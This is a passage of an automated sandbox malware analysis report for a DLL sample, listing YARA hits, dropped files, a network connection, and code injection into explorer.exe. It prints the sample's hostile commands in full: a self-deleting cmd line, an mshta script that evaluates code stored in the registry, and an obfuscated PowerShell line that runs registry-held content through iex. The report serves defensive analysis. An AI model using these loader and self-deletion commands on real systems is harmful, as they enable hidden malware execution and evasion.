Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\iig1japh.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\0hvnxdzw.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd delete

Source: Yara match	File source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277155521.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.327048178.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328107644.0000000004ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.323863639.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277582302.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277005147.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.276805211.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277047889.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277544043.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.276930570.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 1928, type: MEMORYSTR
Source: Yara match	File source: 2.3.rundll32.exe.4c86b40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4c86b40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4bda4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4c594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4bda4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.326908581.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.396215708.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.394439164.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.395073730.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.326960112.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\3r0Cgcbr8c.dll
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\3r0Cgcbr8c.dll			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6416

Thread sleep time: -10145709240540247s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iig1japh.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0hvnxdzw.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4944			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4521			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: explorer.exe, 0000001A.00000000.412668542.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
Source: explorer.exe, 0000001A.00000000.423556966.0000000000680000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 0000001A.00000000.404550743.000000000069D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: RuntimeBroker.exe, 00000020.00000000.597070582.000001C95EA58000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}so
Source: explorer.exe, 0000001A.00000000.411765907.00000000062C4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000000.402898816.0000000004287000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 0000001A.00000000.434857653.000000000820E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
Source: explorer.exe, 0000001A.00000000.412668542.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000001A.00000000.412966126.0000000008223000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00l

Source: C:\Windows\System32\loaddll32.exe

Process queried: DebugPort

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 94.140.115.8 80

Maps a DLL or memory area into another process

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 498000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC86661580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2600000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 49C000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC86661580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 25E0000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC86661580	Jump to behavior

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute read	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\control.exe

Memory allocated: C:\Windows\explorer.exe base: 25E0000 protect: page execute and read and write

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3968 base: 498000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3968 base: 7FFC86661580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3968 base: 2600000 value: 80	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3968 base: 49C000 value: 00	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3968 base: 7FFC86661580 value: EB	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3968 base: 25E0000 value: 80	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3968 base: 7FFC86661580 value: 40	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3968			Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3968			Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 86661580			Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 86661580			Jump to behavior

Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Soxq='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Soxq).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gjvyfiw -value gp; new-alias -name huwuvwioi -value iex; huwuvwioi ([System.Text.Encoding]::ASCII.GetString((gjvyfiw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gjvyfiw -value gp; new-alias -name huwuvwioi -value iex; huwuvwioi ([System.Text.Encoding]::ASCII.GetString((gjvyfiw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gjvyfiw -value gp; new-alias -name huwuvwioi -value iex; huwuvwioi ([System.Text.Encoding]::ASCII.GetString((gjvyfiw "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hvnxdzw.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iig1japh.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE3E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1476D44366854E63BD1CA8712B7CCE92.TMP"	Jump to behavior
